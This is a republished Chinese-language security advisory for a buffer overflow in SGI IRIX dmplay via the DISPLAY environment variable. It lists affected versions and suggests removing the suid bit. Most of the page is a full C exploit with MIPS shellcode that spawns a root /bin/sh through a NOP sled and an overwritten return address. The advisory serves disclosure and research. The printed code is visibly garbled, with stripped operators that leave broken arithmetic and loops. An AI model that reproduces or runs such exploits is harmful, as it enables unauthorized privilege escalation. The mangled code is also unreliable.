IRIX dmplay缓冲区溢出

2008-04-09 04:31:40来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

IRIX dmplay缓冲区溢出

发布日期:2000-08-04
更新日期:2000-08-04

受影响系统:

SGI IRIX 6.3
SGI IRIX 6.2
不受影响系统:

SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.4
SGI IRIX 6.5.3m
SGI IRIX 6.5.3f
SGI IRIX 6.5.3
SGI IRIX 6.5.2m
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.4
描述:


某些版本IRIX下的dmplay存在缓冲区溢出。dmplay用于在IRIX下播放视频剪辑,由于
它使用了X Client技术,需要访问DISPLAY环境变量,但是并没有仔细检查该变量值
长度,提供了缓冲区溢出的机会。

<* 来源:LSD contact@lsd-pl.net *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/
/*## /usr/sbin/dmplay #*/

#define NOPNUM 800
#define ADRNUM 156
#define PCHNUM 148
#define TMPNUM 52

char shellcode[] =
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;

char jump[] =
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;

char nop[] = "\x24\x0f\x12\x34";

main ( int argc, char * argv[] )
{
char buffer[10000], adr[4], pch[4], tmp[4], *b, *envp[2], display[128];
int i;

printf( "copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n" );
printf( "/usr/sbin/dmplay for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n" );
if ( argc != 3 )
{
printf( "usage: %s {62|63} xserver:display\n", argv[0] );
exit( -1 );
}

if ( !strcmp( argv[1], "62" ) )
{
*( ( unsigned long * )adr ) = ( *( unsigned long ( * ) () )jump)()
10396 32;
*( ( unsigned long * )pch ) = ( *( unsigned long ( * ) () )jump)()
10396 32 900 30540;
*( ( unsigned long * )tmp ) = ( *( unsigned long ( * ) () )jump)()
10396 32 8000;
}
if ( !strcmp( argv[1], "63" ) )
{
*( ( unsigned long * )adr ) = ( *( unsigned long ( * ) () )jump)()
10348 32;
*( ( unsigned long * )pch ) = ( *( unsigned long ( * ) () )jump)()
10348 32 900 - 84;
*( ( unsigned long * )tmp ) = ( *( unsigned long ( * ) () )jump)()
10348 32 8000;
}
sprintf( display, "DISPLAY=%s", argv[2] );
envp[0] = display;
envp[1] = 0;
b = buffer;
for ( i = 0; i < NOPNUM; i )
{
*b = nop[ i % 4 ];
}
for ( i = 0; i < strlen( shellcode ); i )
{
*b = shellcode[ i ];
}
*b = 0xff;
for ( i = 0; i < ADRNUM; i )
{
*b = adr[ i % 4 ];
}
for ( i = 0; i < TMPNUM; i )
{
*b = tmp[ i % 4 ];
}
for ( i = 0; i < PCHNUM; i )
{
*b = pch[ i % 4 ];
}
*b = 0;
execle( "/usr/sbin/dmplay", "lsd", buffer, 0, envp );


建议:

暂无
临时解决办法:
去掉它的suid root属性

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:DiskCheck.pl 条件竞争漏洞

下一篇:IRIX inpview 链接竞争漏洞